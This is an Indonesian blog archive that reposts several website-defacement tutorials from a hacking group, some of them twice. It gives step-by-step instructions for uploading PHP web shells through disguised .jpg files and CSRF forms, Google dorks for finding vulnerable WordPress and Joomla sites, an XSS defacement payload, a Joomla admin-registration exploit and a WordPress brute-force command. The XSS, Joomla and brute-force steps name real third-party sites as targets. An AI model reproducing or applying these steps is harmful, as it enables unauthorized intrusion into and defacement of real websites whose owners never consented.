Archive for June 2013
Assalamualaikum,,,
Hadewh,, demi sobat2 IDCA ane buatin nih Tutorial sederhana, biar pada ngerti,, wkwk :p
Langsung sajalah... Repot banget dah gitu males ngetik.. wkwkwk :p
Mohon Tutorial ini dibaca, diliat, dipahami dan dicermati baik2 yaahh,, ga ngerti ane jitaakk!! :3
ini untuk CMS Wordpress yah trus ane jg pake madspotshell,, jadi klo sobat pake shell yg lain pasti beda atuh :3
Notice!
Kalo bisa index jangan dirusak! budayakan menghargai hasil kerja keras orang lain!
Dowload Madspotshell
Udah ah, langsung Buka Shellnya yah.. ;)
Saatnya nyari index nya,, dimana??? Dimana Dimana Dimana?? Hajiaahh! Malah nyanyi? -_- hehehe, santai ya sob, ;) Lihat Gambar! untuk mencari index nya sobat cuma perlu mencarinya di Path/folder utama website tsb. biasanya di Public_Html, klo ga ada, pokoknya dalemnya berisi file2 utama seperti: Wp-Login,Wp-Admin,Wp-Config, wp-content, dsb
.bmp)
Liat baik2 gambar diatas! di path utama berisikan semua files website! noh liat ada index.php, udah ketemu kan? kalo mau nyari config, klik aja wp-config.php :p
Ane harap, indexnya jangan dirusak, sebaiknya dibackup,, cukup upload aja file index.html halaman deface sobat! atau bisa juga index.php kita ubah. klik "R" di bagian kanan kemudian sobat rename aja jadi index.php_backup lalu klik [>>] untuk save!
Keterangan:
R : Rename
E : Edit
D : Download
X : Delete
[>>] : Eksekusi
selanjutnya buatlah file index.php yg baru lalu pastekan script deface sobat, dan save! liat gambar!
.bmp)
.bmp)
kalo sudah, langsung cek aja hasilnya,, :p hmm,, udah ah begitu aje kagak pelu repot2 :p
kalo ada yg ditanyakan, mampir aja di grup kami : Indonesian Cyber Army
Content Created By Onix AQua
Sumber: http://indocyberarmy.blogspot.com/2013/03/cara-tebas-index-website.html#ixzz2Xh6jTJLS
Untuk mengupload PHP Shell ini kita biasanya mencari fasilitas upload file.php , nah yang jadi pertanyaan kalau web target hanya mendukung file.jpg untuk di upload gimana ? Nah itu yang akan saya sharing tekhniknya. Tahap-tahapnya seperti berikut ini. Tapi dengan catatan anda telah menguasai website target dengan tekhnik : sql injection , LFI / RFI , atau exploit.
1. Siapkan dulu file shell.php seperti : C99Shell, r57, atau lainya cari aja di google banyak
2. Rename dengan nama : shell.php.jpg
3. Install add ons Tamper Data dulu di browser mozilla kita, Download disini
4. Restart dan kita mulai upload
5. Cari fasilitas uploads gambar pada website target, kemudian tamper data kita jalankan
6. Trus Uploads shell.php.jpg kita dan tamper
7. Setelah langsung jalankan tamper datanya, tunggu pop out dari tamper data muncul , cari file shell.php.jpg dan rename path shell.php.jpg menjadi shell.php ! ingat yah
Sekarang anda tinggal cari dimana file shell anda berada .
Dan buka path shell.php anda di url browser dan siap meluncur ke TKP. Tapi inget, gak semua web target bisa kita lakukan dengan tekhnik ini .Kalau gak berhasil , silahkan hubungi adminnya aja langsung
Sumber: http://indocyberarmy.blogspot.com/2013/02/cara-tamper-data-upload-php-file.html#ixzz2Xh6ZgPOo
1. Siapkan dulu file shell.php seperti : C99Shell, r57, atau lainya cari aja di google banyak
2. Rename dengan nama : shell.php.jpg
3. Install add ons Tamper Data dulu di browser mozilla kita, Download disini
4. Restart dan kita mulai upload
5. Cari fasilitas uploads gambar pada website target, kemudian tamper data kita jalankan
6. Trus Uploads shell.php.jpg kita dan tamper
7. Setelah langsung jalankan tamper datanya, tunggu pop out dari tamper data muncul , cari file shell.php.jpg dan rename path shell.php.jpg menjadi shell.php ! ingat yah
Sekarang anda tinggal cari dimana file shell anda berada .
Dan buka path shell.php anda di url browser dan siap meluncur ke TKP. Tapi inget, gak semua web target bisa kita lakukan dengan tekhnik ini .Kalau gak berhasil , silahkan hubungi adminnya aja langsung
Sumber: http://indocyberarmy.blogspot.com/2013/02/cara-tamper-data-upload-php-file.html#ixzz2Xh6ZgPOo
Udah lama ngga posting tentang tutor defacing website hehee, Sekarang saya akan sempatkan membahas tentang Cyber Gravity lagi nih... yaitu Cara Deface Website Menggunakan Teknik XSS Vulnerability.
Sebelumnya udah pada tau belum apa itu XSS Vulnerability? XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini !
1). Pertama, Masukan Dorknya :
2). Kalo sudah, Pilih salah satu web yang akan kita deface.
3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.
4). Kemudian tekan Enter.
Sumber: http://indocyberarmy.blogspot.com/2013/02/cara-deface-website-menggunakan-teknik.html#ixzz2Xh6T2ctg
Sebelumnya udah pada tau belum apa itu XSS Vulnerability? XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini !
1). Pertama, Masukan Dorknya :
inurl:"/showcatrows.php?CategoryID="
2). Kalo sudah, Pilih salah satu web yang akan kita deface.
Contoh : saya pakai web ini http://www.examsolutions.co.uk/...?CategoryID=13
3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.
Contoh : http://www.examsolutions.co.uk/...?CategoryID=13"><marquee><h1>Hacked by Cirebon-Cyber4rt</h1></marquee>
4). Kemudian tekan Enter.
5). Selesai, Website sudah berhasil kita deface :D
Triknya memang cukup simpel, dimana kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML.
Sekian tutorial deface website kali ini dari saya, semoga artikel tentang Cara Deface Website Menggunakan Teknik XSS Vulnerability ini dapat bermanfaat bagi sobat.
Source: Hacker Newbie
Sumber: http://indocyberarmy.blogspot.com/2013/02/cara-deface-website-menggunakan-teknik.html#ixzz2Xh6T2ctg
Langsung saja ;)
Dork :
inurl:"/?ptype=post_listing"
inurl:"/?ptype=post_event"
inurl:"/?page=property_submit"
intext:"Geo Places Theme by"
intext:"(You can upload more than one images to create image gallery on detail page)"
Site::
- http://site.com/?ptype=post_listing
- http://site.com/?ptype=post_event
- http://site.com/path/?ptype=post_listing
- http://site.com/path/?ptype=post_event
Sebelumnya Rename dulu Shellmu jadi ext. jpg
cth: shell.php.jpg / shell.php;.jpg
Upload shellmu,, gunakan tamper data. Silahkan Lihat Cara Tamper Data (Upload PHP File)
Hasilnya bisa dilihat - http://site.com/wp-content/themes/GeoPlaces/images/tmp/[shellmu] - http://site.com/path/wp-content/themes/GeoPlaces/images/tmp/[shellmu]
Video Tutorial
Sumber: http://indocyberarmy.blogspot.com/2013/02/wordpress-geoplaces-themes-shell-upload.html#ixzz2Xh5tGS28
Assalamualaikum....
ehm,, jumpa lagi nih dengan coretan2 semerawut ane tapi ngangenin untuk dibaca,, wkkwkwk yo dah, dah pasti pada ga sabar kan udah nunggu dari kemaren?? wkwkwk langsung daaahh :p
Silahkan tutorial ini di baca dulu baik2, dipahami dan dipelajari, baru dah sobat praktekin :p kalo seandainya gagal, itu karena website udah di patch :p
"Talk Less Do More!" :p
oke dah simak nih! sebelumnya download dulu bahan2nya :p
1. Download : Exploit Joomla.html Password: Lihat
2. Titip Nama : Indonesian Cyber Army
Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Langkah Langkah::
1. Cari web target di Google.com dengan memasukkan Dork berikut:
intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com
#Dork Kembangin Sendiri :p
2. Pilih target sobat, lalu masukin exploit berikut:
index.php?option=com_users&view=registration
3. Ane disini mengambil contoh:
http://mobile.resto-lincontournable.com/index.php/utiliser-joomla/utiliser-extensions/composants/composant-flux-rss/un-flux-rss
4. kemudian ane ganti menjadi:
http://mobile.resto-lincontournable.com/index.php?option=com_users&view=registration
.bmp)
5. Setelah itu klik kanan>klik View Page Source atau bisa juga tekan tombol keyboard CTRL+U
kalo sudah muncul page sourcenya, lalu tekan tombol CTRL+F atau klik menu Find ketik hidden. cari seperti kode berikut:
.jpg)
.jpg)
.jpg)
8. Setelah itu akan muncul peringatan bahwa password harus diisi sama! Masukkan password sobat!
9. Setelah password diisi, klik Register! lalu buka email sobat dan klik link Konfirmasinya!
.jpg)
.jpg)
11. Masukkan Username & Passwordnya! lalu klik Login! kalo contoh disini:
Username:genesis
Password:onix
Goodluck!!! :p
udah gitu aja! Salam........ :p
Sumber: http://indocyberarmy.blogspot.com/2013/03/cara-deface-dengan-teknik-exploit-joomla.html#ixzz2Xh5gpDVE
ehm,, jumpa lagi nih dengan coretan2 semerawut ane tapi ngangenin untuk dibaca,, wkkwkwk yo dah, dah pasti pada ga sabar kan udah nunggu dari kemaren?? wkwkwk langsung daaahh :p
Silahkan tutorial ini di baca dulu baik2, dipahami dan dipelajari, baru dah sobat praktekin :p kalo seandainya gagal, itu karena website udah di patch :p
"Talk Less Do More!" :p
oke dah simak nih! sebelumnya download dulu bahan2nya :p
1. Download : Exploit Joomla.html Password: Lihat
2. Titip Nama : Indonesian Cyber Army
Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Langkah Langkah::
1. Cari web target di Google.com dengan memasukkan Dork berikut:
intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com
#Dork Kembangin Sendiri :p
2. Pilih target sobat, lalu masukin exploit berikut:
index.php?option=com_users&view=registration
3. Ane disini mengambil contoh:
http://mobile.resto-lincontournable.com/index.php/utiliser-joomla/utiliser-extensions/composants/composant-flux-rss/un-flux-rss
4. kemudian ane ganti menjadi:
http://mobile.resto-lincontournable.com/index.php?option=com_users&view=registration
.bmp)
5. Setelah itu klik kanan>klik View Page Source atau bisa juga tekan tombol keyboard CTRL+U
kalo sudah muncul page sourcenya, lalu tekan tombol CTRL+F atau klik menu Find ketik hidden. cari seperti kode berikut:
.jpg)
6. Copy kode tersebut, lalu buka Exploit Joomla.html yang udah sobat download tadi dengan Notepad, lalu pastekan kode tersebut, dan masukkan juga site target dan Email sobat! liat gambar !
.jpg)
7. Lalu Save! Setelah itu buka file Exploit Joomla.html nya, Klik Register!
.jpg)
9. Setelah password diisi, klik Register! lalu buka email sobat dan klik link Konfirmasinya!
.jpg)
10. Lalu masuk kehalaman admin login nya!
http://mobile.resto-lincontournable.com/administrator
.jpg)
Username:genesis
Password:onix
Tararaaaaaaaaaaaaaa!! Sobat masuk sebagai admin! trus tebas deh index nya :p Liat Cara Tebas Index
udah gitu aja! Salam........ :p
Content Created By Onix AQua
Sumber: http://indocyberarmy.blogspot.com/2013/03/cara-deface-dengan-teknik-exploit-joomla.html#ixzz2Xh5gpDVE
Assalamualaikum :)
Pada kesempatan kali ini aku mau kasih tutorial deface dengan tekhnik CSRF, oke tanpa basa basi kita mulai yah :D
Bahan-Bahan:
1. Download Script CSRF
===============================================================
DOWNLOAD DISINI Password: Lihat
===============================================================
Note: Aktifkan Java Script untuk download!!
2. Download MadspotShell Disini Extract dulu dari file Rar!
3. Cari target dengan DORK :
Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Langkah- Langkah:
#Saya menggunakan SHELL dari teman saya om X Inject :D (tampilan shell akan berbeda beda loh setiap jenisnya)
Sekian :)
Sumber: http://indocyberarmy.blogspot.com/2013/02/deface-dengan-csrf-cross-site-request.html#ixzz2Xh5XuIHY
Pada kesempatan kali ini aku mau kasih tutorial deface dengan tekhnik CSRF, oke tanpa basa basi kita mulai yah :D
Bahan-Bahan:
1. Download Script CSRF
===============================================================
DOWNLOAD DISINI Password: Lihat
===============================================================
Note: Aktifkan Java Script untuk download!!
2. Download MadspotShell Disini Extract dulu dari file Rar!
3. Cari target dengan DORK :
- inurl:/wp-content/themes/shepard
- inurl:/wp-content/themes/money
- inurl:/wp-content/themes/clockstone
- inurl:/wp-content/themes/ambleside
- inurl:/wp-content/themes/pacifico
#Dork dikembangkan sendiri ya :)
4. Untuk coba2 gunakan Live Target & Live Target 2
5. Great Thanks To om Edo aka Mr. Goodday aka 007 Yg udh ngajarin :D
6. Titip Nama :: Indonesian Cyber Army ( IDCA ) | Stealth Defacer Hacking Team (SDHT)
4. Untuk coba2 gunakan Live Target & Live Target 2
5. Great Thanks To om Edo aka Mr. Goodday aka 007 Yg udh ngajarin :D
6. Titip Nama :: Indonesian Cyber Army ( IDCA ) | Stealth Defacer Hacking Team (SDHT)
#Persiapan sudah selesai, sekarang tinggal kita eksekusi :)
7. Download Video Tutorial | Pass : onixidca
7. Download Video Tutorial | Pass : onixidca
Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Langkah- Langkah:
1. Masukan Dork ke dalam google (kurang jelas lihat gambar)
2. Pilih salah satu target yang kita dapat tadi (Kurang jelas lihat gambar)
Contoh :
http://www.robertcarpentry.com/wp-content/themes/pacifico/images/ ganti menjadi http://www.robertcarpentry.com/wp-content/themes/pacifico/theme
3. Klik folder "Function" lalu klik file "Upload-bg.php" / "uploadbg.php" / "upload.php"
Note: Jika muncul "You Must Login....."atau blank? cari target lain!! :p "Jika muncul "error" berarti Web target Vulnerable" ;p
4. Buka file CSRF.html yang tadi sudah di download dengan notepad, ganti URLTARGET dengan link yang berada di addres bar target kamu tadi. Lihat Gambar! lalu save!
Contoh: "http://www.robertcarpentry.com/wp-content/themes/pacifico/theme/functions/upload-bg.php"
5. Buka file CSRF.html, akan muncul upload file. lalu Pilih Madspotshell.php lalu klik upload .
Jika berhasil maka akan muncul seperti ini (lihat gambar)
6. Udah diganti ? dan jika berhasil maka tampilannya akan jadi seperti ini
#itu tandanya shell backdoor kamu sudah terpasang :D sekarang terserah mau kamu apain website itu :)
#Saya menggunakan SHELL dari teman saya om X Inject :D (tampilan shell akan berbeda beda loh setiap jenisnya)
Tampilan madspotshell::
7. Untuk eksekusi Index, silahkan lihat Cara Tebas Index Website Wordpress
Sekian tutor yang dapat saya berikan :)
kalo kurang jelas, boleh tanya kan pada ORANG CAKEP INI XD
Sekian :)
Sumber: http://indocyberarmy.blogspot.com/2013/02/deface-dengan-csrf-cross-site-request.html#ixzz2Xh5XuIHY
Salam Sobat,, ;)
Hajiahh,, dini hari kagak ngapa2in neh, ga bisa tidur :3 tapi ga apa apa dah, setidaknya bisa membuat Tutorial yang berguna buat sobat semua ^_^ langsung dah disimak yooo.. ;)
Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Pertama Download Bahan-Bahannya:
WPBruteforce
Password: http://indocyberarmy.blogspot.com
Dork: inurl:/wp-login.php
Yup, saatnya kita beraksi.. :)
Live Target: http://live-target.pusku.com/
Pertama, Extract File yg didownload tadi di Directori C: sehingga posisi menajdi C:\WPBrute
.bmp)
Lalu buka comand dengan cara : Klik Start>Run>ketik cmd
.jpg)
.jpg)
Ubah posisi directori dgn cara: ketik cd.. trus enter!
Lalu setelah itu masukkan perintah C:\>cd WPBrute lalu tekan enter!
.jpg)
Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!
.jpg)
Lalu masukkan perintah: WPBforce.exe -url=http://www.tvbba.nl -user=admin -pass=wordlist.txt -threads=10
.jpg)
Lalu tekan enter!
.jpg)
Tunggu proses hingga selesai!
.jpg)
Wew! Berhasil tuh! wkwkwk Mantap! :p
.jpg)
Langsung Login dah!
GoodLuck!! :D
Content Created By Onix AQua
Sumber: http://indocyberarmy.blogspot.com/2013/03/cara-mudah-deface-wordpress-site-dengan.html#ixzz2Xh5K5ay5
Hajiahh,, dini hari kagak ngapa2in neh, ga bisa tidur :3 tapi ga apa apa dah, setidaknya bisa membuat Tutorial yang berguna buat sobat semua ^_^ langsung dah disimak yooo.. ;)
Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Pertama Download Bahan-Bahannya:
WPBruteforce
Password: http://indocyberarmy.blogspot.com
Dork: inurl:/wp-login.php
Yup, saatnya kita beraksi.. :)
Live Target: http://live-target.pusku.com/
Pertama, Extract File yg didownload tadi di Directori C: sehingga posisi menajdi C:\WPBrute
.bmp)
Lalu buka comand dengan cara : Klik Start>Run>ketik cmd
.jpg)
Biasanya posisi default directories di Cmd : C:\User\User_Name>
.jpg)
Ubah posisi directori dgn cara: ketik cd.. trus enter!
ex:
C:\User\User_Name>cd..
C:\User>cd..
C:\>
Lalu setelah itu masukkan perintah C:\>cd WPBrute lalu tekan enter! .jpg)
Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!
.jpg)
Lalu masukkan perintah: WPBforce.exe -url=http://www.tvbba.nl -user=admin -pass=wordlist.txt -threads=10
.jpg)
Lalu tekan enter!
.jpg)
.jpg)
Wew! Berhasil tuh! wkwkwk Mantap! :p
.jpg)
GoodLuck!! :D
Content Created By Onix AQua
Sumber: http://indocyberarmy.blogspot.com/2013/03/cara-mudah-deface-wordpress-site-dengan.html#ixzz2Xh5K5ay5
.jpg){kind=link}
.jpg){kind=link}